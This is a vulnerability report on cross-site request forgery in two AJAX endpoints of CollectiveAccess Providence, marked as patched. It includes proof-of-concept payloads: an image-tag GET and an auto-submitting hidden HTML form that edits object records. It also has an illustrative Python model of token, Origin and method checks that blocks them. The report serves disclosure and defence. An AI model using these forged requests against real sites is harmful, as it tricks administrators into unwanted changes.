Cross-Site Request Forgery (CSRF) in collectiveaccess/providence
Reported on
Oct 11th 2021
Description
More AJAX endpoints vulnerable to CSRF.
1: GET http://10.0.2.15/providence/index.php/find/BrowseObjects/createSetFromResult
2: POST http://10.0.2.15/providence/index.php/find/SearchObjects/saveResultsEditorData
Proof of Concept
1: http://10.0.2.15/providence/index.php/find/BrowseObjects/createSetFromResult?set_name=new&mode=from_results&item_ids=
<img src="http://10.0.2.15/providence/index.php/find/BrowseObjects/createSetFromResult? set_name=new&mode=from_results&item_ids=">
2: http://10.0.2.15/providence/index.php/find/SearchObjects/saveResultsEditorData
<html>
<body>
<form action="http://10.0.2.15/providence/index.php/find/SearchObjects/saveResultsEditorData" method="POST">
<input type="hidden" name="_formName" value="caEditableResultsComplexDataForm" />
<input type="hidden" name="form_timestamp" value="2633930542" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="row" value="0" />
<input type="hidden" name="col" value="0" />
<input type="hidden" name="idno_accession_number" value="edited!" />
<input type="hidden" name="bundle" value="ca_objects%2Cidno" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Impact
This vulnerability is capable of tricking admins into editing object data and creating objects.
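The two PoCs above succeed because the endpoints act on a browser's ambient session without proving the request came from the site's own page. The following Python model, added here as an illustration and not code from CollectiveAccess/Providence, replays the report's two requests (GET via an image tag, auto-submitted cross-site POST) plus a legitimate submission through the three checks a defender would want on any state-changing AJAX endpoint: reject GET, verify Origin/Referer, and verify a per-session token in constant time. The server secret, session id, `csrf_token` field name and the `attacker.example` origin are constructed for the example; the host `10.0.2.15` and the form fields are those shown in the PoC.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed server-side secret for this example; a real deployment keeps it
# out of source control and rotates it.
SERVER_SECRET = b"example-only-secret"
# Hypothetical site origin, taken from the host used in the report's PoC URLs.
SITE_ORIGIN = "http://10.0.2.15"


def issue_csrf_token(session_id: str) -> str:
    """Per-session anti-CSRF token: HMAC-SHA256 of the session id under the
    server secret. The server embeds it in its own forms; a page on another
    origin cannot read it, so a forged form cannot include it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_state_changing_request(method, headers, form, session_id):
    """Return (accepted, reason) after three independent checks:
    1. only POST may change state (an <img src=...> fetch is a GET);
    2. Origin (or Referer as fallback) must be the site's own origin;
    3. the form must carry the session's token, compared in constant time."""
    if method.upper() != "POST":
        return False, f"state change via {method.upper()}; only POST is accepted"
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "no Origin or Referer header"
    parts = urlsplit(source)
    source_origin = f"{parts.scheme}://{parts.netloc}"
    if source_origin != SITE_ORIGIN:
        return False, f"cross-site request from {source_origin}"
    expected = issue_csrf_token(session_id)
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or invalid csrf_token"
    return True, "ok"


def run_samples():
    """Replay the report's two PoC requests plus two same-origin submissions
    (all request data constructed here) through the checks above."""
    session_id = "admin-session-123"  # constructed
    samples = {
        # PoC 1: hidden <img> on another site issues a GET to createSetFromResult
        "poc1_img_get": ("GET", {"Referer": "http://attacker.example/page.html"},
                         {"set_name": "new", "mode": "from_results", "item_ids": ""}),
        # PoC 2: auto-submitted cross-site form posts to saveResultsEditorData
        "poc2_form_post": ("POST", {"Origin": "http://attacker.example"},
                           {"_formName": "caEditableResultsComplexDataForm",
                            "form_timestamp": "2633930542", "id": "1", "row": "0",
                            "col": "0", "idno_accession_number": "edited!",
                            "bundle": "ca_objects,idno"}),
        # Same-origin POST without the token (e.g. a stale or hand-built form)
        "same_origin_no_token": ("POST", {"Origin": SITE_ORIGIN}, {"id": "1"}),
        # Legitimate POST from the site's own form, token included
        "legit_post": ("POST", {"Origin": SITE_ORIGIN},
                       {"id": "1", "csrf_token": issue_csrf_token(session_id)}),
    }
    return {name: check_state_changing_request(m, h, f, session_id)
            for name, (m, h, f) in samples.items()}


if __name__ == "__main__":
    for name, (ok, reason) in run_samples().items():
        print(f"{name:22s} {'accepted' if ok else 'rejected'}: {reason}")
```

Note that the `_formName` and `form_timestamp` fields in the PoC are predictable values any page can supply, so they give no CSRF protection; only a value the attacker's origin cannot read (the token) or cannot forge (the browser-set Origin header) does. The Origin check alone is a useful defence in depth but should not replace the token, since some clients omit both Origin and Referer.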
Occurrences
ajax_results_editable_complex_data_form_html.php L42-L103
saveResultsEditorData html
Thanks for finding this one. It's patched.